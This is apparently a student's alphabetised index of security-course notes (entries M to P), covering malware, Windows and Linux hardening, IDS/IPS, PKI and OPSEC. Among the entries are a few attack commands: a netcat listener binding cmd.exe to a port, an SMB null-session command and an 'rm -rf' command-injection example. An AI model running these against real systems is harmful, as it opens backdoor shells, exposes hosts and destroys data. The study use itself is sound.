                                                    maillog sent it's log to syslogd, ( date time hostname program_name : msg_sent_to_syslogd) --> first filed in
maillog                                 6   144,145
                                                    msg is queue id (if multiple entry for msg each will be assiciated with same id)
maillog - queue identification number   6     145   id no assigned to the msg, appear in msg id of the mail in mail header
malcious code                           3      28   logic bombs, trojan horses, trap doors (backdoors)
Malicious Browser content               2      36   ex:spyware(trojan,keystroke monitor),vuln in:activeX,java applet,java script
malicious mobile code                   2      20   malware that replicate from PC to PC
Malicious SW                            2      20
Malware                                 2      20   is SW that written with malicious intent to perform action without usr permition
Malware - Analysis                      2      45
Malware - Mitigating                    2      45
Malware - user education and policy     2      46
Malware Capability                      2      37   destruct data,leaking confidentiality,backdoor,
Malware Defense technique               2      42   activity monitoring prog,Malware scanner,file integ chk,stripping e-maill attach,patch
Malware propagation techniques          2      39   removable media,E-Mail attach,web browsing,network vuln,instant messs,peer-2-peer
Man                                     1       7   spans a city or town,use high speed media,connect several facilities together
man <command>                           6     226   to read the manual pages for any given command
managing cooling                        1     229   increased server density means more heat,tempreatures varies from place to place
managing power                          1     229   power needs are increaing,server density is increasing,it takes long time to increase capcity
Mannerisms                              2     144   keystroke,hand written,tread
mantraps                                1     241   a secure portal that require the individual to identify himself to pass
Marco Virus(Worm)                       2      22   using instructions that can be interpreted within application (Word,excel )
Marker virus                            2      37   info leakage,obtain info from victim sysytem registry send it though ftp
MAU (Multi-station access unit)         1      13   central device passes tokens serially from 1 station to the other ,one way and in order.
MBR function                            6     81      usually runs a more complex boot loader from elsewhere on the system disk like: GRUB (Linux), openboot (Unix)
MBSA features                           5     300     4 pages
mbsacli.exe                             5     262     microsoft baseline security analyzer,patch scaning,scriptable
mbsacli.exe                             5     304     scan remote hosts for missing hotfixes,analyze data and return it in ftp,mail,smb
mbsacli.exe /Id "report name"           5     305     Display a detailed report
mbsacli.exe /l"ell"                     5     305     List all the reports that are available
mbsacli.exe /r "ip-range" /f "file"     5     304     /r for ip address range,/f for redirect output to file
MCS                                     6     205
MD2 - Message digest 2                      4   32    128-bit hash
MD4 - Message digest 4                      4   32    designed for fast processing in software, also 128-bit hash
MD5                                         2   127   $ 1 $ mean it hashes with MD5,Unix saltes MD5
MD5 - Message digest 5                      4   32    slower that MD4, but work on weaknesses reported on MD4, 128-bit hash
media access protocols                      1   10    protocols calrify the rules for sending signals to each other in a connected network,Ethernet,Token Ring
meeting point                               1   219   choose easy distant walking
meeting point leader                        1   220   account for employees,first one out
Melissa virus                               2    37   info leakage ,send doc by mail to attacker
Message digest                              4   32
metabase                                    5   309   iis seprate registry,you have to include it in a system snapshot
                                                      low for temp internet,medium for users,high for admins,services run as system == Low label --> Internet Explorer
MIC (Mandatory Integrity Control (Label))   5   117
                                                      == High label --> administrative privilages == Meduim Label = default
MIC (Mandatory Integrity Control (Read))    5   117   by default doesn't restrict read or excute
MIC (Mandatory Integrity Control (Rule))    5   117   process can't edit securable object unless the object is the same or less MIC label
MIC (Mandatory Integrity Control )          5   116   has label(system,high,medium,low) on each object(folder,registry key,shares)
MIC (Mandatory Integrity Control)           5   116   perserve integrity of os files,registry,data between applications,previously WIC == enable by default in win vista
MIC dosen't restrict Read/Eecute            5   117
MIC prior to ADCL                           5   117
Microsoft Baseline Security Analayze        5   300   free,take range of ip to scan,another dangerous service in SQL , launch MBSA
microsoft office kit                        5   157   has templates to configure all office products,word,excel,..
microsoft resource kits                     5   271   documentation , scripts , tools , for :: IIS,SMS,SQL Server,Exchange
Microsoft Security Assesment Tool           5   261   200 question,make report with pritorized action list,prespective of ciso
Microsoft System Center Operation           5   329   Mom server ,centralize log ,watch servers,extract event logs and audit data
                                                      a web site load active x control into IE to scan system for missing updates == disadv is not automatic update == scan
microsoft update                            5   59
                                                      for missed hotfixes&install it ==
                                                      Security Template from Microsoft, NIST, CIS --> debugged and tested == Template from Microsoft, NIST, CIS -->
Microsoft, NIST, DISA, NSA                  5   146
                                                      debugged and tested
MIME encoding                               2   228
min password policy                         5   163   prevent users from recyling their old faviorate password
minlen=$                                    6    60   minimum length of passwd must be $ in/etc/pam.d/system-auth in pam_cracklib argument
Mission Statement                           2    55   the Idea behiend the prand, what customer expect from u ,way we want people to view us
mitnick-shimomoura                          3     4   in christmas 1994,on Tsutomu shimomura home netwrok,informaation securty professtional
mitnick-shimomoura                          3     7   shimaomoura has 3 machines runing solaries 1 (SunOS 4)
mitnick-shimomoura defense                  3    17   detetection,patching,disable unused services,network vulnerability scan,HIDS,NIDS,firewalls
mkdir <newdir_name>                         6   218   make a directory
                                                      enforce the bell -la padula mandatory access model and is used in labeled security protection profile (LSPP)
MLS                                         6   205
                                                      environment
                                                    each level is a sensitivity -category pair with category being optional, when using category the level is written as
MLS/MCS                                   6   205
                                                    senstivity:category-set( s0:c0.c1023)--> from c0 to c1023, if category not used the level is written as sensitivity
MLS/MCS in fedora 10                      6   205   have only one sensitivity s0 and it support up to 1024 category c0-c1023
MMC.exe                                   5   146   edit security template
modems issue                              3   104   auto-answer,bi-directional connection,connection to external isp
modularization in server 2008             5    14   easy addation/removal of these roles and features
mom server                                5   329   centralize log,watch servers,extract event logs and audit data
monster.com                               4   265   is an employment website, search for jobs than guess the company infrastructure
Morris Worm                               2    27   Availability attack(DOS),use hole in unix sendmail prog&fingure daemon
mositure detectors                        1   227   a detective control used to detect water/flood ,installed on surfaces
mount point                               6    27   is where the computer puts the file system so it can access it
MPLS (Multiprotocol Lable Switching)      1    18   layer 2.5 technology,support ip,ipv6,voip
MSAT                                      5   261   microsoft security assesment tool,200question,report
msblaster                                 3   118   Aug-03
MS-CHAPv2 option with PPTPv2              5   229
MSDE                                      2    30   microsoft desktop exchange
MS-SQL udp port 1434                      6   182
MTD(maximum tolerable downtime)           2    92   how long can ur system be compromised without effect company
multi resolution filter                   3   242   at nips, simple tests applied to traffic, then more tests to it, this enhance system performnce
Multifactor Authentication                2   248   password,certificate,Token,one-Time Authen,third mechanism
multi-level screened network              3    54   allow limited acces from zone to a previous zone,colors,
Multi-Master replication / AD             5    32   change in AD database will be replicated to all other domain controller automatically
Multipartite Viruses                      2    24   can infect boot record as well as program file can spread across the network
mutt                                      6    10
mv <new file name> <new file name>        6   216   move file from one location to another or to rename it.
MyDoom worm                               2    41   peer-to peer worm
MySql port                                3    55   TCP3306,web server connect to this port to query data
NAC (Network access control)              1    29   isolate systems intially connected in vlans until scanned
nachi worm                                3   159
NAP (Network acces protection)            5    15   check if users have the latest patches,recent virus updates,
NAP (network access points)               1     7   Isp provide internet access to the customers through NAP
Nasl (nessus attack scripting language)   3   134   nessus attack scripting language used for writing plugines
Nat                                       3    66   network address translation to address in rfc 1918
nat                                       6   178   2 builtin chains in which to place nat policy rules: pre-routing chain,post-routing chain
Natural ventilation                       1   226   moving air through a door
nbstat -A ipaddress                       5   203   returns the local NetBIOS name table for that computer,name and code
nbtstat.exe                               5   283   netbios realted data
nc.exe -L -p 7890 -e cmd.exe              5   216   netcat run and listen to 7890 and connect an incoming session to new instance of cmd.exe
NDA - Non Disclosure Agreement            4   241   u cannot disclose sensitive information outside the company.
NDA (Non-Dislosure Agreement)             2    78   protect(senstive info,confidentialit,both parties),legal doc must be clear and reviewd
need to know                              2   108   least privilege+more restrict by time
                                                    Access available only : when, what, where necessary, according to business requirements and with Least Privilage
Need to know - OPSEC                      4   242
                                                    concept
nessus client                             3   135   can run from different machines,control the scan process
nessus color codes                        3   142   red=critical,orange=moderate,yellow=moderate low,gray=low
nessus server                             3   135   run the actual scans and send results to a nessus client
net user guest $5&uuu /active:no /times             disable guest&random pas
net.exe                                   5   283   can be used to show shared folders,drive mapping,account and group information,services
net.exe accounts                          5   311   lockout and password policy
net.exe share                             5   102   used in sharing
net.exe use                               5    55   map network drive
net.exe use\\target\IPC$ "" /user""       5   169   to stablish null session
netBios                                   5   205   required for full backward with older operating systems
netbios - null user sessions              5   206
netBios code number                       5   203   ********2 pages********
netbios datagram service                  5   209   udp/138
netBios disabling                         5   205   netbios not realted to null session
netBios name                              5   203   name and code number reveal the service running on the target,registry_Key=netbt
netbios name service                      5   209   tcp/udp/137
netbios session service                   5   209   tcp/139
netcat listener                           3    82
netdiag /test:testName /v                 5   282   run specific testName and show more data
netdiag.exe                               5   282   troubleshooting tool,2000,xp,2003 only,variet of testsand dump the output to console
netdiag.exe /v                            5   282   run all tests available,show more data
netfilter                                 6   175   is the commercial name of Iptables
netranger                                 3   195   cisco ids
netsh.exe                                 5   218   manage windows firewall and network related services,mange ipsec
netsh.exe                                 5   282   like cisco ,int to interface,set machine ip allow you to excute commands remotly
netsh.exe advfirewall firewall set        5   218   rule /?,how to crreate rule,
netsh.exe advfirewall firewall show       5   218   rule name=all,dump the details of every rule
netsh.exe advfirewall show allprofi       5   218   allprofiles,summary of your profiles options(domain-private-public)
netsh.exe firewall show config            5   312   show windows firewall settings
netsh.exe ipsec dynamic                   5   221   see all ipsec configuration using netsh.exe ipsec dynamic add mmpolicy name=TempMMpolicy
netsh.exe set machine IpAddress           5   283   allow you to excute netsh commands remotly
netsh.exe winsock show catalog            5   312   get the winsock all api about network configuration
Netsky Worm                               2    31   W32,infected systems and their backup,systemrun slowly and shutdown
netstat                                6   67    summerize tcp/ip network traffic, -a --> all the service or ports acive, -n --> display in numeric format ( show IPs)
netstat                                6   199   identify running services and connections to each
netstat.exe                            5   283   show all listening ports
netstumbler                            3   146   wirelss active scanner,retrive: wireless channel,access point mac,ssid,signal and noise level
netwok tap                             1    22   to see all traffic in a raw wire without having to reconfigure switch
network adapter binding                5   201   a path of communication between network component and physical network adapter
network configuration tools            5   282   wmic.exe , netsh.exe , getmac.exe , ipconfig.exe , route.exe , net.exe , netstat.exe , nbtstat.exe
Network design objectives              1    31   seprate servers,protect internal network,provide defense in depth,protect all systems
Network devices                        1    25   switch, hub, router, bridge, repeater
network IDS                            3   174   passive sensor,uses signaturs,anomaly,application protocol analysis
network location types                 5   213   public,private,domain network
network location types domain          5   214   least stricted rules
network location types private         5   213   a trusted network that doesn't have domain controllers
network location types public          5   213   like airport most restricted rules
                                                 is categorization label assigned to network adapter card and the network to which it is attached at the moment .
network profile                        5   213
                                                 When first connecting you wil be prompted to choose
Network protocol                       1    41   to standerize the format ,order and timing ,and the meaning ….of communications
Network segments,sections              1    32   public ,semi-public,private
network taps                           3   188   solution for the spanning port ,work also on fiber,no imapct on performance,need tap for each wire
Network-aware tools                    2    45   tool use signature and behavior to examin network traffic
networking                             3    32   all connections in big endian
newgrp                                 6   45    login to a new group ( when create a file it's group will be that grp) -->newgrp grpname
                                                 provide transperent file access for clients with files and filesystems on a "server A", file sharing implement as rpc
NFS (Network file System)              6   96
                                                 service UDP port 2049
                                                 mount <serverip>:<sharename> <mountpoint>, any attempt to look in mount point it will cause rpc to the server
NFS client                             6   97
                                                 and display content from the server
Nic auto-sensing                       1    23   the NIC automatically detect the cable type for proper communication
Nick Leeson and barring bank - OPSEC   4   243
Nids - active vulnerability            3   207   like vulnerability scanners used by nids
NIDS - Encrypted traffic               3   189   Use anomaly analysis -increase false negative-
Nids - passive fingerprinting          3   206   atechnique to monitor network traffic and identify the hosts operating systems
Nids - passive vulnerability           3   207   new method to identify vulnerable services,characteristics of applications
NIDS - Snort                           3   198
NIDS - TCPdump                         3   195
nids advantages                        3   184   audit for other controls ,….
nids challenges                        3   186   topology,encrypted traffic,quantity,quality,performance,very costy
NIDS cost                              3   193
Nids Development                       3   206
NIDS performance limits                3   191   bandwidth, decryption , llts of small packets decrease performance
NIDS -Signature Quality vs. Quantity   3   190
nids topology limitations              3   187   spanning ports,taps,affect switch performance
                                                 fined default web files,examin web server and CGI security, look for misconfig, based on libwhisker, discover vuln in
nikto                                  2   275
                                                 sites,
Nimda                                  2    41   worm, works to increase no of infected systems.
NIPS - how it work                     3   238
Nips - multi resolution filter         3   242   at nips, simple tests applied to traffic, then more tests to it, this enhance system performnce
                                                 false positives drops legitmate traffic,more false negative than ids, Latency, hasn't extensive rule-base for
nips challenges                        3   243
                                                 identifying attacks on the network, unlike NIDS.
nips deployment                        3   240   before the firewall or behind firewall, it depends.
                                                 inline cause single point of failure for network,use custom ASICS to support high-speed analysis with complex
nips details                           3   241   inspection, uses data normalization & assembly techniques on aggregation traffic, hierarchical rule classification
                                                 scheme used to classify and identify traffic
                                                 improved throughput & response time, automatic anaysis/signature updates, environmental anomaly analysis,
nips developments                      3   245
                                                 protocol scrubbing, limiting stream to apply QOS, enfore organisation policy by drop traffic of unauthorized Apps
nips latency requirement               3   242   traffic analyzed should be in the milli-second range
nips passive analysis                  3   244   to reduce false positives by identify host OS, network architecture, vulnerabilities on network.
nips protocol scrubbing                3   246   can be used to clean garbage from the traffic stream,send rst to connections to tier them down
nips rate limiting                     3   246   to apply qos mechanisms to network traffic
                                                 packet header info, transport layer session info, App layer sesion info, payload string matching, App layer analysis,
nips rules capabilities                3   242
                                                 complex regular expression matching
nips security                          3   242   must be against compormise, configurng nips without ip or mac on data interface
nips to enforce org policy             3   246   by drop traffic from unauthorized Applications like peer-to-peer applications
                                                 client-server model(provide central admin control of user account through network), server contain data files called
NIS (Network Information Service)      6   101   maps, client request info from maps, master server have true data file which must be rebuilt and redistributed if
                                                 changed.
NIS+                                   6   101   is like NIS, but provide more security.
NLA (Network Level Authentication)     5   257   in RDP6,authenticate client and server before session is created in memory,prevent DOS
NLB (Network load balance)             5   230   built in RRAS to support load balancing
nlog tool                              3   117   provides aweb based interface for database for analysis of data
nmap                                   3   122   queries open ports to attempt to know which application is running on port
nmap decoy scan                        3   115   use diiferent spoofed ip address to scan so it hard to detect who is the hacker
nmap scan of stateless firewall        3    57   used to know firewall rules,if nmap port give a rst/ack allow,if no response deny
nmap scan types                        3   126   use hostnames,wildcard,ranges,cidr notation,combined
                                                 in /etc/pam.d/system-auth in pam_tally module tells the system not to lock the root account to prevent DoS
No_magic_root                          6   62
                                                 against the root account
Non-Competition                        4   241   u cannot work for a competitor
Non-Compliane                               2    76     termination,Reprimand
                                                        prevent Bluetooth devices from being discoverable. But devices in this mode should reply resond to the
non-discoverable mode                       4   153
                                                        PAGE_request from another Bluetooth device.
Non-Dislosure Agreement                     2    78     protect(senstive info,confidentialit,both parties),legal doc must be clear and reviewd
Non-Repudiation                             4    12     able to prove in a court of law that someone has sent the message.
Non-Solicitation                            4   241     if u leave, don't take anyone with u.
NOP                                         3    32     No operation instruction can be used to reach the payload
nop                                         3   176     no operation,used in bufferoverflow attacks,0x90 value
norton internet security                    3   252     Antivirus plus something, ips, can report to centralized management console
                                                        inter process communication across network using SMB,only buffer areas == file system used to leverage SMB p in
NPFS (Named Pipes File System)              5    88
                                                        interprocess com == acts as RAM with shared folder
nslookup                                    1     76    a way to make forward lookup and reverse lookup
ntbackup.exe                                5   69,71   built in win xp/2003 ,backup locked,encrypted,registry files , restore center vista
ntbackuprestore.exe                         5     72    to restore files backuped by ntbackup to vista/2008/seven
NTFS characteristics                        5     88    permissions,auditing,encryption,compression,transaction oriented processing
NTFS Compliexity is security vulnerablity   5     92
NTFS compression                            5     89    by NTFS driver itself not 3rd part,make file blue in color
NTFS DACL                                   5     90    aset of NTFS permissions on a file or a folder,sum total of ACE
NTFS explicit permissions                   5     91    solid-checked box ace
NTFS inherited permissions                  5     91    gray-checked box ace
NTFS least privilege                        5     95
NTFS nt file system                         5     88    maximum size is 16TB,transaction oriented processing
NTFS permission inheritance                 5   90,91   not mandatory,only root folder of a drive can have only explcit ACE
NTFS scope of inheritance                   5     92
NTFS special permission box                 5     90    custom indvidual ACE that doesn't translate into standered ACE
NTFS standard permission                    5     91    collection of one or more individual ACE
NTFS-ACE                                    5     90    is individual permission access control entiry
NTFS-unsed exception                        5     88    boot from another sys , recover sw on FAT
N-tier web application                      2    219    clustring services to increase load balancing and redundancy,more secure than 3-tier
ntlast                                      5    284    help you scaning event logs for things ,comma delimited output for easy ,foundstone
NTLM                                        2    146
                                                        NTLM v2 is not vulnerable, NTLM-predecessor to kerbreros &still supported for compatability, NTLM-used in
                                                        workgroup&domains, NTLM-use user passphrase hashes to compare it in domain, NTLM-v1 vuln to
NTLM                                        5    38
                                                        sniff&crack(cain)be it use lanmanager & NT/MD4, NTLM-v2 not vuln to crack where it doesn't use lanmanger, NTLM-
                                                        is supported by win NT &later
NTlm v1 lan manager disabling               5   172
NTLM V2                                     5   172     not vulnerable
NTLMv2                                      2   147     pass depend on domian name,server challenge ,randome hash
NTLMv2 enabling                             5   172
ntrights.exe                                      5   119   manage user rights from command line
Null Alogorithm                                   4   95    it does nothing to the msg, used if u want to turn-off encryption on IPSEC
null session command                              5   169   net use \\target\ipc$ "" /user:""
null session disabling                            5   170   from GPO or registery by seting RestrictAnonymous to 2 === Null user session SMB session without usern,passw
null user session                                 5   169   smb session to server where username and password are blank
O_DIRECT                                          6   18    kernel flag in linux allow programmers to take adv. Of write directly to device
Oakely                                            4   97    key exchange
obfuscation                                       2   242   making code more difficult to follow or understand
object_r                                          6   202   every object must have all three parts of a security context and are assigned by default to the role object_r
OCC                                               2   178
ocredit=$                                         6   60    min no. of other character is $ in/etc/pam.d/system-auth in pam_cracklib argument
                                                            like CBC but prevents the same plain text from generating the same ciphertext by using internal feedback
OFB - (Output feedback mode)                      4   22
                                                            mechanism.
offensive OPSEC                                   4   248
                                                            1- Identify your target, 2- Collect open source or other info, 3- estimate (capacity, upcomming products, business
offensive OPSEC process                           4   254
                                                            vulnerability, approach to marketing, …..)
Offshore coding                                   2   199   outsourcing SW
off-the-shelf library                             2   243   ‫المكتبه الجاهزه‬
old rain forest puppy rds exploit                 5   242   on iis4,can be prevented by removing msadc folder from iis
OllyDbg                                           5   125   is debbugger tool in windows,used oly when debugg right
one - way function                                4   50    reveal the time and space required to execute intractable problems
one way encryption                                2   117   one way hashing ,one way encryption
                                                            in /etc/pam.d/system-auth in pam_tally module tell the system what to do when reaching a set no of fail=lock
onerr=fail                                        6   62
                                                            account
One-time pad Authentication                       2   249   some thing u have,list of pass,
one-time password                                 2   142   each login use diff pass(Token,chalenge response,S/key)
open BSD                                          2   125   emplyee stronger password in hashing
Open Source Collection - OPSEC                    4   257
open source collective- about me                  4   269
open source collective -company financials        4   266
open source collective- individual info           4   268   www.intelius.com
open source collective- product info              4   267   the big three credit reporting agencies
                                                            www.fundrace.org, Google.com (Business partners pages, phone listing, soft and hardware used),
open source collective-info from other web site   4   265
                                                            www.monster.com, www.gao.gov (US General Accounting Office)
open ssh                                          6    14   encrypt remote access that replace telnet and ftp and it is included in mac by default
Ophcrack                                          2   134   tool:Cracking tool
OPSEC - 5 steps                                   4   238
OPSEC - corporate information                4   257   Change in ownership , Owner stock purchase or sale ,Employee stock option plans
                                                       OPSEC's focus on establishing a process for identifying the weak links often exploits by adversaries, one size not fit
OPSEC - management app. Operation security   4   236
                                                       all. Adjust and develop fro your specific need
OPSEC - protecting against OPSEC failure     4   253
OPSEC - The pentagon Pizza Delivery Story    4   236   we need to keep the details private
OPSEC - three law of defense                 4   237   1- Know the threat, 2- Know what to protect, 3- if u fail in the first two, the enemy wins.
OPSEC - weekly assessment cycle              4   238   Five steps [consideration]
OPSEC -Extract Knowledge                     4   250
OPSEC- mail example                          4   248
OPSEC- putting it all together               4   243
OPSEC-sensitive information                  4   245   Mark sensitive information by level, must enforce Mandatory Security Policy.
optical smoke sensors                        1   223   light beam and detecting plate when the smoke particles obscure the detector will alert
OR function                                  4    16
organizational unit                          5   114   container in active directory contain users,computers.
Organizational unit GPO                      5   159   linked only to particular OU
OS command injection                         2   258   command on the input form ex kh;rm -rf
OS command injection defense                 2   259   avoid making sys call within application tier,remove malicious char or define valid char
os finger printing                           3   129   nmap signature to identify different os.
OS overwiew                                  6    25   kernel , shell, hardware
OSI                                          1    43
OSI vs TCP/IP                                1    45
out-of-band Authentication                   2   249   SMS password
OWA Worm                                     5   242   outlook web access worm can be prevented by removing or renaming iis exchange folder
packet sniffer usage                         1   135   monitor,gather,analyze,debug,detect,gain,filter
PAGEFIL.SYS                                  5   132
Paging files                                 5   131
PAM (pluggable authentication modules)       6    58   system libraries that handle linux authentiation it is originally invented by SUN
                                                       in /etc/pam.d and comman pam files format type-->pam management group control-->action if pam auth fail
PAM config files                             6   58    module-path module-argument-->specify name and path of the module in use (within /lib/security) and what action
                                                       should be passed into it
PAM management groups                        6   58    that handle specific types of authentication requests --> Auth, Password, Session, Account
                                                       pam module check the passwd against dictionary words to make assessment and other constraint in
pam_cracklib                                 6   60
                                                       /etc/pam.d/system_auth
pam_tally                                    6   62    /etc/pam.d/system-auth it is pam module used to count fail logins
pam_unix                                     6   61    remember old passwd module to restrict use of previous passwd also in /etc/pam.d/sustem-auth
PAN (personal area network)                  1    7    usally wireless,range <=10 m, two or more devices ,same party or different parties
panic button                                 1   244   detective control , silent alarm to not to inform intruder
PAP(Password Authen Protocol)                2   113   Weak ,send pass in clear txt,can usr hash it before sending but still weake
parallel modem option                        3   155   in war dailing will allow you to scan more numbers in shorter time
Parasitic Malware                     2    21   must be attached to other program(Need a container)
Paros                                 2   232   tool that can edit in session cookie
passwd aging                          6   55    by 2 files /etc/login.defs and /etc/default/useradd
passwd file fields                    6   52    7 fields
passwd -l                             6   62    lock account
passwd -u                             6   62    unlock account
password assessment                   2   122   dicionary attack,brute force ,Hybrid, precumpution brute force attack(rainbow table)
password cracking                     2   119   offiline process to guess password given password file info
password cracking - methods           2   122   dicionary attack,brute force ,Hybrid, precumpution brute force attack(rainbow table)
password enfore stronger (Linux)      6   60    /etc/pam.d/system-auth & use this module: pam_cracklib
password policy - Enforce strong      2   138   acount lock,complex,usr can't reuse last 5 pass,change pass interval<time to crack
password policy - Enforce strong      2   139   acount lock,complex,usr can't reuse last 5 pass,change pass interval<time to crack
password storage                      2   119
password Strength                     2   120   quality of algo,key length,cpu cycle,ch set support,password length)
Pat                                   3    69   transilating traffic from multiple internal sources to a single external address
Patch Management                      2    45
patch management 3rd party            5    66   sites :: shavlik.com,bigfix.com,ecora.com,gfi.com,patchlink.com
                                                1- app may stop or have unexpected behavior so test patch first on non product system, 2-some patches need
patch -new patches impact ?           6   159
                                                reboot, Test patches on Non-production systems before distribute the patches widely
patches - how to find new patches     6   160   1-Automated updates, 2-Vendor Web/FTP site, 3-Mail List
                                                1-Everyday new vulnerabilities, 2- Vendors releasing patching to fix these vulnerabilities, 3-un-patched systems are
patching - why ?                      6   158
                                                still major reason for compromised systems.
patching systems                      3    19   mitinik,timely patching,before or after the exploit
PCI (Payment card industry)           2   178   Marchants
PDC                                   5    32   primary domain controller can modify database
Peception management                  2   197
peering points                        1    7    Isp provide connecitivity to each other through this points.
Peer-to-peer neworking                2    41
pen testing                           3   155   used to determine the validity of identified vuln
pen testing techniques                3   157   war dailing,war driving,sniffing,eavesdropping,dumpster diving,social engineering
Penalties                             2    76   termination,Reprimand
per_user                              6   62    in /etc/pam.d/system-auth in pam_tally module keeps account of each individual use
Performance monitoring                2   271   CPU,Memory utilization,Latency ,throughput
Permission Schema                     5    92
Permutation                           4   21    also called Transposition, change the character from its position not the char itself.
persistant tier                       2   218   DB,SQL,Oracle,MySQL
Persistent Cookie                     2   232   browser store them in txt file in hard disk and it still when the browser exits,have expiration data
personal firewall                     3    64   software residing on each computer
pervious version tab in vista/later   5    77   windows restore include data files and latest changes that can be restored
PGP - as Web of trust                      4   132   to use it like the PKI
PGP - certificate's fingerprint            4   133   used to trust the integrity of this certificate.
PGP - history                              4   104
PGP - On the fly encryption                4   106   hard disk encryption, files are encrypted on the disk, and decrypted to be read.
PGP - Private passphrase                   4   108   most critical part of key generation, password protect ur stored private key
PGP - protects emails                      4   104   PGP provides confedentiality through encryption, integrity & source identification through digital signatures.
PGP - Trust Depth Level                    4   132   to limit how much of this web you trust.
PGP - Trust establishment                  4   133   trusting a certificate isnot the same as trusting a person.
PGP -encryption                            4   105
                                                     can be used to digitaly signed a message, uses SHA-1 (1024, 2048 min key) to generate the digest, & uses it's private
PGP- encryption & digital signature        4   107
                                                     key to encrypt it, and the reciever would use the sender public key to decrypt the digest and validate it
Phishing Filter                            5   187   compare URL against list of known phishing sites & malware download URLs
Phishy Pheatures                           5   187
phone sweep                                3   104   commercial war dialer,scan range looking for modem with auto answer
physcial topology                          1    8    how network is wired together through geomatric shapes,how network is actually connected
physcial vs. logical topology              1    10   they are Independent on eash others
physical attacks                           3    30   someone has a physical access,can shutdown
physical security - managing               1   246   encryption,guards,signs,mantraps,shred everthing,inspect package to know what leaving your organization
Physical security - Objective              1   213
piggybacking                               2    41
pilge pump                                 1   227   corrective control for water/flood to remove water
PIN - Personal Identifier Number           4   151   used @ Bluetooth to authenticate devices together, entered manually @ eah device.
PIN brute force                            4   152   4-digit PIN could be brute forced at 63 msec, using a Pentium4 3GHZ system
ping                                       1   122   local lans<10ms,wan and internet>200,300 ms
ping scan                                  3   127   tell you which machines are up
                                                     allow users to exchange encrypted information over public network, hierarchy infrastructure system used to create
PKI                                        4   115
                                                     digital certificates.
PKI - other uses                           4   131   NAC, NAP, Code & driver, General Uset Authn., Wireless Authen., IPSEC & VPN Authen., Digital Signature.

PKI - biometric words                      4   133   PGP translates the Hexadecimal digits into twenty Biometric words to be easy to pronounce to be validated
PKI - Certification life cycle             4   120
PKI - Disk Encryption                      4   130   another use of PKI is to create certificates to be used for disk encryption
PKI - Signature & certificate revocation   4   133
PKI - Verisign                             4   115   a certification authority
                                                  incomplete Standards, certification of Cas (directly affect how secure the entire PKI based upon them), Cross-
PKI problems                            4   135
                                                  certificae between Cas, user-education or perception, lack of critical mass)
PKI servers types                       4   118   Root CA, Intermediate CA, Issuing CA
PKI SSL crypto                          4   128   SSL Steps from client to server
PKI SSL handshake                       4   128   SSL Steps from client to server
POC                                     2    80   point of contact
point to point tunnling protocol PPTP   5   226   no ipsec,no nat problem,PPTPV1 vulnerable,use PPTPV2
policy - Baseline document              2    59
policy - Convincing the org by policy   2    54   what make their job easier,executive:language of money
Policy - Creating                       2    73
policy - definition                     2    61   is directive that indicate decision to follow toward object
policy - Scope/Applicability            2    75   who apply policy for and what systems are applicable
Policy categories                       2    71   Program Policy, Issue-specific Policies, System Specific Policy
Policy Creating - Issue                 2    74   what the problem you try to solve
policy statement must                   2    70   SMART+5Ws(What,Who,Where,When,Why)
policy table of content                 2    68
policy vs. Procedure                    2    60   policy(who,what,why) procedure(how,where,when)
Pollard rho-method                      4    70   is the best-known solution for ECDLP are fully-exponential.
POP (point of prsence )                 1     7   Isp provide internet access to the customers through POP
                                                  when rpc start on a computer it register with portmapper service so portmapper tarck all all rpc running on the
port Mapper                             6   104
                                                  system use UDP port 111 and TCP port 111, it's a registrar keeps track of which rpc program are using which ports
                                                  services register with the PortMapper and clients query it, PortMapper can provide info on all of these RPCs to
port Mapper                             6   104
                                                  remote computers that desire their sevice                           ⃝
port scanning                           3   121   scan 0-65,535 twicee one for udp and one for tcp
portable fire extinguish                1   223   comustible(paper-wood)typ A Δ - liquids:typ B :□ -electrical:typ C :
Portal throughput                       2   144   amount of time it takes to authen using Biometric
POS(point of sale)                      4   147   retail chains are mitigating toward wireless networks to extend their point-of-sale (POS) solutions.
POST                                    2   228   does not append any data to URL,it append it to the HTTP header which may encypt
postfix                                 6   175   is a Linux proxy application used for e-mail, & can coexist with Iptables.
post-routing chain                      6   178   NATs packets when the source address of the packet needs to be changed
Posture Issues Example                  2    57
power and cooling issues                1   230   average 65F or 18c,redundancy,scalable solutions,humidity=45%
power quality issue - blackout          1   231   power failure (sustained)
power quality issue - brownout          1   231   voltage drop (sustained)
power quality issue - fault             1   231   power failure (short)
power quality issue - sag               1   231   voltage drop (short)
power quality issue - spike             1   231   voltage increase (short)
power quality issue - surge             1   231   voltage increase (sustained)
power Shell                         5    15   .net integrated framework for excuting commands and scripts
power shell commands                5   291   pipe symbol | , list local event , show the last 20 events , show only warning a7 error
power users group                   5    96   no longer needed,to provide elevated powers to some user without being admins
Power Users group                   5    96
powershell                          5   290   cmd replacement,perl-like,win server2008,7 by default,available for xp-sp2
powershell                          5   290   create com files,object oriented
PPTPv1                              5   227   vulnerable ,ms_chapv1
pptpv2                              5   227   use 128-bit rc4 encryption,ms_chapv2
                                              not considered high power and not quite ready for serious use it was used for graphical work and disktop publishing,
pre mac OSX                         6   12
                                              hav noisy network protocol, it is used for desktop work not server work
Pre-computation                     2   147
Pre-computation Attack              2   124   pre cmpute hash store result in DB ,Rainbow table
Pre-computation attack - fighting   2   147   use Salts,sever challenge,randomize final hash,paas dep on session,domain,usr name
pre-routing chain                   6   178   NATs packets when distination address of the packet needs to be changed
presentation                        1    44   handles the format and compression jpeg,mpeg..
presentation tier                   2   218   Web server(IIS,Apache), provid I/p and O/P to users ,under constan attack
previous version how?steps          5    79   right click folder>properties>pervious version tab
primeter assesment                  1   234   area geography,traffic patterns,activities of other buildings,area crime statics,
primeter defination                 1   234   enclosed space has been labeled a restricted area
primeter dimensions                 1   235   floor:raised foors,in-floor ventilation,wall:doors,windows
Prinsiple of least privilage        5    95    grantee least perm to users
Pritorizing CIA                     2   10    C=pharmaceuticals,I=Banks&financial inst,A=E-commerce
private address                     1    63   10.0.0.0/8,172.16.0.0-172.31.0.0/12,192.168.0.0/16,127.0.0.0/8 loopback
private address space               3    67   10.0.0.0-10.x.x.x , 172.16.0.0-172.31.x.x , 192.168.0.0-192.168.x.x
Private circuit (network)           4    84   pro:dedicated lines, Cons:expensive
Private key                         4    29   If I encrypted the message with my private the others could decrpted the message with my public key
Procedure - definition              2    62   Step-by-step used for operation,Mandatory
Procedure vs. policy                2    60   policy(who,what,why) procedure(how,where,when)
process explorer                    5   284   a taskManager replacement,sysinternals
process table                       3    62   proxy firewall use them to keep connection straight
Program Infectors                   2    22   attach itself to existing prog (.com,.exe)
